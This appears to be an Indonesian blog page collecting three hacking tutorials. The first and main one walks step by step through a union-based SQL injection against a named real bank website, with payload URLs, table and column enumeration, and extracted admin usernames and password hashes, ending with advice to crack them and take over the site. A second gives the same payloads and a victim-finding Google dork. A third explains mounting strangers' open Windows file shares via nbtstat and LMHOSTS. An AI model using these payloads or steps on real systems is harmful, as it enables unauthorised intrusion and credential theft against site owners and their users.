Perlu diketahui, dengan dork yang sama belum tentu kita mendapatkan calon korban yang sama ! Untuk tutorial ini, saya menggunakan Dork (Google bisa lebih banyak memberikan SQL Dork kepada anda dari pada diri saya sendiri ):

Dork-Dork bisa kamu lihat disini Kumpulan Dork SQL Injection Update 2010

Dari sekian banyak calon korban, maka:
http://www.bankpapua.com/kantor.php?jenis=2
merupakan target saya pada tutorial sederhana ini.

N0LDR
“Target sengaja tidak saya sensor agar PoC (Proof of Concept) pada tutorial ini jelas. Kepada para pembaca saya harapkan untuk tidak melakukan tindakan pengerusakan di kemudain hari pada web site ini. Ingat, dengan melakukan pengerusakan berarti anda membunuh karier terhormat anda di masa depan. Pergunakanlah sebatas pembelajaran”


2. Mencari celah kelemahan

Pengujian apakah calon korban memiliki kelemahan SQL atau tidak. Kita dapat menambahkan karakter minus (-) atau petik tunggal (‘) [tergantung pada sistem (- atau ‘)]pada query yang ada. Jika kita mendapatkan error berarti calon korban memiliki kelemahan terlepas dari bisa di injeksi lebih lanjut atau tidak.

(-) ditambahkan sebelum item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=-2
(‘) ditambahkan sesudah item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=2’

Pada tutorial ini, teknik kedua yang memunculkan error! (berarti web site target memiliki kelemahan SQL Injection. Error yang kita dapatkan adalah:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118


3. Mendapatkan jumlah kolom

Tahap selanjutnya adalah mendapatkan jumlah kolom pada tabel aktif. Tekniknya adalah dengan menggunkan perintah order by sebagai berikut:

http://www.bankpapua.com/kantor.php?jenis=2+order+by+1--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+2--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+3--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+4--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+5--
.
.
.
Kita lakukan pengujian satu persatu (boleh dilompat) hingga kita mendapatkan error yang berarti jumlah kolom terakhir (yang tidak error) merupakan jumlah kolom pada tabel aktif. Pada tutorial ini, kita mendapatkan error pada pengujian ke-6.

http://www.bankpapua.com/kantor.php?jenis=2+order+by+6--

Kita mendapatkan error:


Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118

Berarti jumlah kolom pada tabel aktif adalah 5 (pengujian terakhir yang tidak error)


4. Mendapatkan angka keberuntungan

Angka keberuntungan adalah angka yang dimunculkan oleh sistem yaitu angka antara range jumlah kolom aktif (dalam kasus ini 1-5). Perintah yang kita gunakan adalah union select sebagai berikut:


http://www.bankpapua.com/kantor.php?...C2%2C3%2C4%2C5--

[Jangan lupa menambahkan karakter minus (-) pada awal key (pada kasus kita, key adalah 2)]. Kita mendapatkan angka 1,2,3, dan 4. Di angka-angka inilah tempat kita melakukan query.


5. Mendapatkan versi database server

Dapatkan versi server SQL (dalam kasus ini, MySQL) dengan perintah version(), atau @@version. Kita gunakan version() dan kita pilih angka 4:

http://www.bankpapua.com/kantor.php?...%2C3%2Cversion(),5--

Kita mendapatkan 5.0.51a-24+lenny4 yang berarti MySQL versi 5. Kita sedikit beruntung karena menemukan versi 5 jika versi 4 maka tahap berikutnya adalah “Tebak-tebak buah nanas”.


6. Mendapatkan nama tabel

Gunakan perintah group_concat(table_name) dengan penyeleksian dari information_schema.tables sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(table_name),5+from+information_schema.tables+wher e+table_schema=database()--

Kita mendapatkan nama-nama tabel sebagai berikut:
adunasabah,agenda,anual,atm,atmprima,atmsama,berit a,birate,bunga,
galery,kantor,karir,kontak,konter,kurs,lapkeu,link ers,manajemen,pesertaquiz,
polling_d,polling_h,produk,promo,quiz_peserta,quiz _soal,regulasi,tamu,users. Dari sekian banyak kita pilih tabel users namun harus dikonversi ke heksadesimal terlebih dahulu. Silahkan kunjungi:

http://www.dolcevie.com/js/converter.html

kemudian kita mendapatkan (titik dua ( tidak diikutsertakan) users(ascii) -> 7573657273(hex)


7. Mendapatkan nama kolom

Gunakan perintah group_concat(column_name) dengan penyeleksian dari information_schema.columns sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(column_name),5+from+information_schema.columns+wh ere+table_name=0x7573657273--

0x7573657273 kita dapatkan dengan menggabungkan 0x dengan 7573657273 (hasil konversi tadi). Kita mendapatkan nama-nama kolom sebagai berikut:
ids,username,password,fullname,address,a_add,a_edi t,a_del,topadmin,akses. Kita pilih username dan password.


8. Mendapatkan Data

Gunakan perintah group_concat(username,0x3a,password) dengan penyeleksian tabel users tadi sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(username,0x3a,password),5+from+users--

Kita mendapatkan:

webmaster: †¥²¯d”¥´¹¥¥¨±¬²»©¦£vttz
sdm: †¥²¯d”¥´¹¥•¨±uvw
sekper: †¥²¯d”¥´¹¥•©¯´©¶uvw

Terenkripsi Tahap berikutnya adalah mendapatkan plain text dari password yang terenkripsi, google! Setelah dapat, cari halaman admin kemudian login dengan account webmaster, Anda telah berhasil take over http://www.bankpapua.com/

N0LDR
“Tutorial ini hanya sebagai pembelajaran semata. Hacking is good”
sumber : jasakom.com


Artikel Asli Berjudul Hack Website menggunakan SQL injection
di www.perwira28.blogspot.com
Under Creative Commons License: Attribution Non-Commercial

Selasa, 23 Februari 2010

LATIHAN HACK INJEK SQL

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

Nah itu artinya SQL Injection, untuk translate ke bahasa sesuai yg ada mengerti silahkan di translate sendiri. :D.
Ok, SQL Injection itu sendiri dapat terjadi oleh beberapa faktor, di antaranya kesalahan setting pada server yang memungkinkan seorang attacker memasukkan karakter dan baris perintah yg membahayakan bagi program, selain itu juga kesalahan dalam coding yg tidak memfilter karakter yg diinputkan oleh user.

Sudah cukup basa basinya.. sekarang sedikit tutorialnya.. :D.
Pertama., carilah sasaran yang mau di injek - injek SQL nya.. Lha nyarinya dimana mas?? tanya lah pada rumput yg bergoyang dombret nyarinya… wjwkwkwkwk.. Nyari di google, misal’e dengan kata kunci

inurl:news.php?id= site:com

Nah.. buanyak bgt kan hasilnya…. sekarang tinggal kita coba satu buat test..
Misal kita menemukan sebuah site dengan alamat sebagai berikut….

http://www.target.com/english/news.php?id=64

Tahap selanjutnya mari kita tambahkan tanda petik (’) diakhir angka 64.. Ups… ternyata muncul kek gini..

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1

Mungkin pada nanya.. mangnya kenapa kalo muncul kek gitu mas..?? Ya itu tandanya error kawand… dah nemu yg asyik error nya.. mari kita lanjutkan ketahap berikutnya.., Ilangkan saja tanda ‘ nya, ganti dengan tanda - (minus) jadi seperti berikut

http://www.target.com/english/news.php?id=-64+order+by+100–
Keterangan : angka 100 itu untuk mencari field nya, tanda minus double di belakang digunakan untuk memberikan Comment pada Mysql Query sehingga sistem tidak akan menjalankan perintah selanjutnya.

setelah ditulis kek gitu… ternyata terdapat error.. like this

Unknown column ‘100' in ‘order clause’

Weeh… Column 100 ndak ada katanya… kita perkecil lagi… coba angka angka misal 10,9 dll ok. Sampai dia tidak memunculkan error unknown column tadi… Setelah di dapat angka yang tidak memunculkan error trus langkah selanjutnya kepriben kiye… (walah boso ngendi maneh.. @_@)…

Buat langkah selanjutnya marih kita select column column tersebut. Lha nyara select nya piye, begini, mari kita coba dengan cara yg sederhana.. misalnya tadi g ada error di coloum 9 so, perintahnya like this

http://www.target.com/english/news.php?id=-64+union+select+1,2,3,4,5,6,7,8,9–

Ok, dah running querynya di address bar, tunggu beberapa saat dan berharaplah akan muncul suatu mukjizat.. wkwkwkwkwkwkw. Nah setelah loading selesai, liad di browser, angka berapa ajah yg muncul… (tempat munculnya di tempat seharusnya artikel ato berita muncul). Misal’e yang muncul tuh angka 3, mari kita explore lebih jauh lagi… kita lihat versi dari databasenya. caranya dengan menjalakan seperti ini

http://www.target.com/english/news.php?id=-64+union+select+1,2,version(),4,5,6,7,8,9–

Nah, setelah itu bakal muncul deh versi dari databasenya, bisa aja versinya 5.2, ato 4.0 atau yg lainnya. Setelah dapet versi databasenya, lanjutin deh buat ngedapetin yang namanya table - table nya. Lha caranye gimana Om??? Wes ga usah panjang x lebar, tar jadi luas wkwkwkw… Untuk mysql versi 5, kita bisa manfaatin yang namanya Information_schema, nah kalo versi 4, ya kita hanya bisa berdoa dan berharap alias maen tebak tebakan… wkwkwkwkwkw.

Buat mencari nama table table nya bisa kita lakuin dengan cara seperti ini.

http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()–

Query diatas bakal menghasilkan nama nama table yg ada di database sesuai dengan nama database yg di gunakan, dan sudah dech kita tinggal pilih table mana yg bakal kita extract colom2 nya dan buat kita cari isi dari colom2 nya.. :D. . Lha cara mengetahui column nya gmn mas??? Nah lho.. lom taut tho… Ok, buat cari tau nama nama column nya kita butuh bantuin sebuah alat yg gunanya buat meng-convert code ascii ke hexa, gunanya buat mengambil nama column berdasar nama table nya..

Nh tak kasih sekalian website yg nyedian fasilitas buat ngonvert hexa to ascii, bisa di coba di http://centricle.com/tools/ascii-hex/ tinggal kalian masukin nama table dah jadi dech kode ascii nya.. :D dan kita tinggal meng-query buat ngedapetin nama column nya seperti ini

http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0xCODEASCITABLE–

Binggo…!!! kita udah ngedapetin nama nama column nya… tinggal deh men-select isinya…

http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(nama_column1,0×3a,nama_column2,0×3a,column3),4,5,6,7,8,9+from+nama_tabel–

arti 0×3a : menampilkan karakter : (titik dua).

Dah.. kita dah dapet isi dari table table… tinggal dilanjutin sendiri…

dah selesai ya…

Happi testing esngiel injecktion ya…

MEREMOTE KOMPUTER ORANG

Pernah dengar istilah NetBIOS over TCP/IP?Kalau sudah, sebaiknya lewatkan saja tulisan ini Dan jika belom boleh disimak :)
Tulisan ini tujuan hanya sebagai pembelajaran saja dan agar dapat kita selalu berhati hati. :) Informasi NetBios sebenarnya dapat kita pakai untuk exploitasi sistem lawan dan berikut ini suatu caruntuk exploitasi target yang menggunakan file/printer sharring

Dalam tulisan ini saya asumsikan anda menggunakan win 98
Sebelum kita mulai coba kita find nbtstat.exe
Sebenarnya fungsi file tersebut adalah untuk menampilkan statistik protokol dan koneksi tcp/ip

Langkah langkah exploitasi :)
1. Click Start-->Program-->MS-Dos prompt--> tulis nbtstat lalu enter
2. Click Start-->Run-->tulis nbtstat lalu OK

Kira kira mucul sperti ini :
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S][interval] ]

-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh

RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying statistics.

Dari informasi diatas sebenarnya sudah dapat kita ketahui fungsi dari nbtstat.exe

Pada kesempatan ini saya akan coba mengulas 2 option diatas yaitu :
-A
-a

misal kita mau mencoba komputer dengan names belog.wasantara.net.id
maka kita gunakan :
nbtstat -a belog.wasantara.net.id

misal kita mau mencoba komputer dengan ip 192.168.1.1
maka kita gunakan :
nbtstat -A 192.168.1.1

Dari perintah diatas kemungkinan yang muncul adalah :
1. Host not found
2. Dan pesan indah seperti dibawah ini :

--------------------------------------------

NetBIOS Local Name Table

Name Type Status
---------------------------------------------
BELOG <00> UNIQUE Registered
POLOS <00> GROUP Registered
BELOG <03> UNIQUE Registered
BELOG <20> UNIQUE Registered
POLOS <1e> GROUP Registered

---------------------------------------------

Jika muncul pesan Host not found, segera hentikan usaha anda, karena akan buang waktu sia sia :)

Jika muncul pesan indah seperti diatas, sebaiknya anda tarik napas, karena perkerjaan lain akan menunggu.
Dari pesan indah tersebut yang menjadi catatan adalah karakter dengan kode BELOG <20> UNIQUE Registered, karena angka 20 ini adalah informasi file dan printer sharing.

Apa langkah kita selanjutnya ?
Setelah kita mempunyai info diatas, cari file yang bernama :
LMHOST atau HOST (win 9x)

Jika sudah ketemu, buka dengan editor seperti noteped dan tambahkan :
192.168.1.1 BELOG

Kemudian simpan.

Selanjutnya
Click Start-->Find-->Computer
masukan nama atau ipnya

Dan anda pasti akan berteriak girang, karena komputer remote sudah bisa anda jadikan seperti HD secondary anda :)

Selamat :)
nb : sekali lagi, mohon tulisan ini hanya sebagai bahan pembelajaran saja dan bukan digunakan untuk merusak dan dari tulisan ini saya berharap, kita jangan seenaknya membuka file/printer sharing